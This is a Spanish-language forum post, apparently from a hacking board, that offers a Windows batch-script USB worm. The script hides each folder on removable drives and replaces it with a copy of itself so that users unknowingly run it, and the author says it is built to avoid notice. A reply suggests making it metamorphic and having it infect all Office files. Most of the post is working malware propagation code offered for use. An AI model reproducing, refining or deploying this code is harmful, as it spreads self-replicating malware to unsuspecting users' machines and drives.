He desarrollado una idea que no he visto en ningun otro lado, una forma de propagacion de un Worm por USB pero de una manera mas insospechada, ya no es el clasico AUTORUN.INF sino que el codigo se copia a si mismo reemplazandose por cada una de las carpetas que haya en esa unidad, por lo que muy seguramente tendra un poco mas de efectividad.
Esta es la idea principal:
@echo off
::Worm USB Prop.
::by Splendit
::U21hcnRHZW5pdXM
FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF "%~d0"=="%%A" GOTO :NEXT
CALL :USB
GOTO :NEXT
:USB
FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF EXIST %%A: (
FOR /F "TOKENS=5" %%B IN ('DIR %%A:^|FIND "DIR"') DO (
ATTRIB +H %%A:\%%B
COPY /Y %0 "%%A:%%B.EXT"
)))
GOTO :EOF
:NEXT
START %~dp0\
::RESTO DEL CODIGO DEL WORM
::
PAUSE
EXIT
Lo primero es detectar si nos estamos ejecutando ya desde la ubicacion principal de dicha unidad para asi abrir el verdadero destino de la carpeta que reemplazamos, que realmente esta oculta, pero que lo hago de esa manera para pasar algo inadvertido, o si es desde otro lado para proceder a hacer la copia a las respectivas unidades.
Saludos
by Splendit
y se copia en todas las unidades de disco para evitar ser borrado, yo tenia uno igual, podes hacerlo metamorfo y que infecte todos los archivos office